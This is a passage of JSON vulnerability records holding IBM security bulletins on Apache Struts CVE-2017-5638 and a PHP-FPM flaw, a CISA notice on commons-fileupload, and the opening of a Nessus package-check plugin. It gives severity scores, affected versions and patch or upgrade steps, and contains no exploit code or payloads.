struts2-json-plugin-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp struts2-spring-plugin-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp xwork-core-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp xstream-1.4.8.jar $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/ \n> cp velocity-1.6.4.jar $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/ \n> cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n> cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n> cp struts2-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n> cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n> cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ (**For 7.2 Only**) \n> cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ (**For 7.2 Only**) \n> cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ (**For 7.2 Only**) 2.5 Clean up the GUI work directories on all management hosts: > rm -rf $EGO_TOP/gui/work/* \n> rm -rf $EGO_TOP/gui/workarea/* \n**NOTE: **If you changed the default configuration for the WLP_OUTPUT_DIR environment variable and the APPEND_HOSTNAME_TO_WLP_OUTPUT_DIR parameter is set to true in the $EGO_CONFDIR/wlp.conf file, you must clean up the $WLP_OUTPUT_DIR/webgui_hostname/gui/workarea/ directory. 2.6 Launch a web browser and clear your browser\u2019s cache. \n2.7 Start the WEBGUI service: > egosh service start WEBGUI\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T01:35:45", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts 2 affects IBM Platform Symphony and IBM Spectrum Symphony (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T01:35:45", "id": "02304D05D897B568E77C8953094F5914F389089362655D2AB68B096E3F3418DC", "href": "https://www.ibm.com/support/pages/node/631039", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:54:34", "description": "## Summary\n\nAn Apache Struts vulnerability was addressed by IBM Social Media Analytics.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM Social Media Analytics version 1.3\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the following interim fix: \n[IBM Social Media Analytics 1.3.0 IF19](<http://www.ibm.com/support/docview.wss?uid=swg24043514>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T22:50:04", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects IBM Social Media Analytics (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-15T22:50:04", "id": "546F05697B8F700EEF28B598121A8A3351E168124EB0852E39278EAE7A99C11B", "href": "https://www.ibm.com/support/pages/node/558271", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-13T05:37:08", "description": "## Summary\n\nThere is a vulnerability in Apache Struts to which the IBM\u00ae FlashSystem\u2122 V840 is susceptible. An exploit of this vulnerability (CVE-2017-5638) could allow a remote attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\n**Affected Products and Versions of FlashSystem V840\u2019s two node types \n** \n_Storage Node_ \n\u00b7 Machine Type Models (MTMs) affected include 9846-AE1 and 9848-AE1 \n\u00b7 Code versions affected include supported VRMFs: \no 1.4.0.0 \u2013 1.4.6.0 \no 1.3.0.0 \u2013 1.3.0.7 \n \n_Controller Node _ \n\u00b7 MTMs affected include 9846-AC0, 9848-AC0, 9846-AC1, and 9848-AC1 \n\u00b7 Code versions affected include supported VRMFs: \no 7.8.0.0 \u2013 7.8.0.2 \no 7.7.0.0 \u2013 7.7.1.5\n\n## Remediation/Fixes\n\n_V840 MTMs_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**Storage nodes:** \n9846-AE1 & \n9848-AE1 \n \n**Controller nodes:** \n9846-AC0, \n9846-AC1, \n9848-AC0, & \n9848-AC1| _Code fixes are now available, the minimum VRMF containing the fix depends on the code stream: \n \n___Storage Node VRMF __ \n_1.4 stream: 1.4.6.1 _ \n_1.3 stream: 1.3.0.8_ \n \n__Controller Node VRMF __ \n_7.8 stream: 7.8.1.0_ \n_7.7 stream: 7.7.1.6_| _ __N/A_| [**_FlashSystem V840 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+V840&release=1.0&platform=All&function=all>)** **for storage and controller node** **are available @ IBM\u2019s Fix Central \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T00:32:46", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem model V840", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T00:32:46", "id": "6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "href": "https://www.ibm.com/support/pages/node/697157", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-13T09:36:02", "description": "## Summary\n\nA vulnerability in the Apache Struts component affects the Service Assistant GUI of Storwize V7000 Unified allowing arbitrary code execution. The Command Line Interface is unaffected.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n## Affected Products and Versions\n\nIBM Storwize V7000 Unified \nThe product is affected when running code releases 1.5.x and 1.6.0.0 to 1.6.2.1\n\n## Remediation/Fixes\n\nA fix for these issues is in version 1.6.2.2 of IBM Storwize V7000 Unified. Version 1.5 is end of service. Customers running on this release of IBM Storwize V7000 Unified can upgrade to v1.6.2.2 for a fix. \n \n[_Latest Storwize V7000 Unified Software_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1003918&myns=s028&mynp=OCST5Q4U&mync=E>) \n \nPlease contact IBM support for assistance in upgrading your system.\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T00:34:31", "type": "ibm", "title": "Security Bulletin:Vulnerability in Apache Struts affects Storwize V7000 Unified (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T00:34:31", "id": "0766EE3C620AAAF614D24B4B93352C6C94F10148776C7854787A45858D29E32F", "href": "https://www.ibm.com/support/pages/node/697609", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:34", "description": "## Summary\n\nIBM OpenPages GRC Platform Web Applications are not vulnerable to the Apache Struts 2 vulnerability CVE-2017-5638 \n\n## Vulnerability Details\n\nIBM OpenPages GRC Platform Web Applications are NOT vulnerable to the Apache Struts 2 vulnerability (CVE-2017-5638). \nPlease refer to [_https://cwiki.apache.org/confluence/display/WW/S2-045_](<https://cwiki.apache.org/confluence/display/WW/S2-045>) for more information on CVE-2017-5638.\n\n## Affected Products and Versions\n\nIBM OpenPages versions 7.0 through 7.3\n\n## Remediation/Fixes\n\nNone\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T22:49:16", "type": "ibm", "title": "Security Bulletin: IBM OpenPages GRC Platform Web Applications are not vulnerable to (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-15T22:49:16", "id": "F1072FE090DABD963C764C2E009454B24AB02021B54C8519F4195C5ABC6E2FF5", "href": "https://www.ibm.com/support/pages/node/294331", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T17:39:35", "description": "## Summary\n\nA vulnerability in the Apache Struts component affects the Service Assistant GUI of SAN Volume Controller, Storwize family and FlashSystem V9000 products allowing arbitrary code execution. The Command Line Interface is unaffected.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n## Affected Products and Versions\n\nIBM SAN Volume Controller \nIBM Storwize V7000 \nIBM Storwize V5000 \nIBM Storwize V3700 \nIBM Storwize V3500 \nIBM FlashSystem V9000 \n \nAll products are affected when running supported releases 7.1 to 7.8. For unsupported versions of the above products, IBM recommends upgrading to a fixed, supported version of the product.\n\n## Remediation/Fixes\n\nIBM recommends that you fix this vulnerability by upgrading affected versions of IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500 to the following code levels or higher: \n \n7.6.1.8 \n7.7.1.6 \n7.8.1.0 \n \n[_Latest SAN Volume Controller Code_](<http://www-01.ibm.com/support/docview.wss?rs=591&uid=ssg1S1001707>) \n[_Latest Storwize V7000 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1003705>) \n[_Latest Storwize V5000 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004336>) \n[_Latest Storwize V3700 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004172>) \n[_Latest Storwize V3500 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004171>) \n \nFor IBM FlashSystem V9000, upgrade to the following code levels or higher: \n \n7.6.1.8 \n7.7.1.6 \n7.8.1.0 \n \n[_Latest FlashSystem V9000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+V9000&release=All&platform=All&function=all>)\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-03-29T01:48:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects SAN Volume Controller, Storwize family and FlashSystem V9000 products (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2023-03-29T01:48:02", "id": "D769235D102AD19A73D51C968FFD8889D9656A19C29D4BE9C66233A668FC8B7A", "href": "https://www.ibm.com/support/pages/node/697171", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-24T01:38:52", "description": "## Summary\n\nIBM API Connect has addressed the following vulnerability.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2019-11043](<https://vulners.com/cve/CVE-2019-11043>) \n**DESCRIPTION: **In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it is possible to cause FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/170207](<https://exchange.xforce.ibmcloud.com/vulnerabilities/170207>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nAPI Connect | IBM API Connect V2018.4.1.0-2018.4.1.8 \nAPI Connect | IBM API Connect V5.0.0.0-5.0.8.7 \n \n## Remediation/Fixes\n\nAffected Product | Addressed in VRMF | APAR | Remediation/First Fix \n---|---|---|--- \n \nIBM API Connect \n\nV5.0.0.0-5.0.8.7\n\n| 5.0.8.7 iFix | \n\nLI81163\n\n| \n\nAddressed in IBM API Connect 5.0.8.7 iFix release on or after 17 January 2020.\n\nDeveloper Portal is impacted.\n\nFollow this link and find the \"Portal\" package.\n\n[http://www.ibm.com/support/fixcentral/swg/quickorder](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=5.0.8.7&platform=All&function=all&source=fc> \"http://www.ibm.com/support/fixcentral/swg/quickorder\" ) \n \nIBM API Connect \n\nV2018.4.1.0-2018.4.1.8\n\n| 2018.4.1.9 | \n\nLI81163\n\n| \n\nAddressed in IBM API Connect V2018.4.1.9.\n\nDeveloper Portal is impacted.\n\nFollow this link and find the \"Portal\" package.\n\n[http://www.ibm.com/support/fixcentral/swg/quickorder](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=2018.4.1.8&platform=All&function=all&source=fc> \"http://www.ibm.com/support/fixcentral/swg/quickorder\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-24T20:33:22", "type": "ibm", "title": "Security Bulletin: API Connect is impacted by a vulnerability in PHP (CVE-2019-11043)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11043"], "modified": "2020-01-24T20:33:22", "id": "DCFA6D7AB52AF169B1D499DB1C9D17C7F39B1072C153E7A30D2D516406BC7458", "href": "https://www.ibm.com/support/pages/node/1172398", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-02-24T18:07:19", "description": "The Apache Software Foundation has released an advisory to address a vulnerable commons-fileupload library used in Apache Struts versions 2.3.36 and prior. A remote attacker could exploit this vulnerability to take control of an affected system. Struts versions from 2.5.12 are not affected.\n\nNCCIC encourages users and administrators of Apache Struts versions 2.3.36 and prior to review the Apache security advisory for [CVE-2016-1000031](<http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E>) and upgrade to the latest released version of Commons FileUpload library, which is currently 1.3.3.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2018/11/05/Apache-Releases-Security-Advisory-Apache-Struts>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "cisa", "title": "Apache Releases Security Advisory for Apache Struts", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-11-05T00:00:00", "id": "CISA:848AFE845B4D41B0B59F2090C2571363", "href": "https://us-cert.cisa.gov/ncas/current-activity/2018/11/05/Apache-Releases-Security-Advisory-Apache-Struts", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-02-19T13:51:02", "description": "This update for jakarta-commons-fileupload fixes the following issue :\n\nSecurity issue fixed :\n\n - CVE-2016-1000031: Fixed remote execution (bsc#1128963, bsc#1128829).\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {}, "published": "2019-05-16T00:00:00", "type": "nessus", "title": "openSUSE Security Update : jakarta-commons-fileupload (openSUSE-2019-1399)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1000031"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:jakarta-commons-fileupload", "p-cpe:/a:novell:opensuse:jakarta-commons-fileupload-javadoc", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2019-1399.NASL", "href": "https://www.tenable.com/plugins/nessus/125212", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-1399.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125212);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-1000031\");\n script_xref(name:\"TRA\", value:\"TRA-2016-12\");\n\n script_name(english:\"openSUSE Security Update : jakarta-commons-fileupload (openSUSE-2019-1399)\");\n script_summary(english:\"Check for the openSUSE-2019-1399 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for jakarta-commons-fileupload fixes the following issue :\n\nSecurity issue fixed :\n\n - CVE-2016-1000031: Fixed remote execution (bsc#1128963,\n bsc#1128829).\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1128829\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1128963\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2016-12\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jakarta-commons-fileupload packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 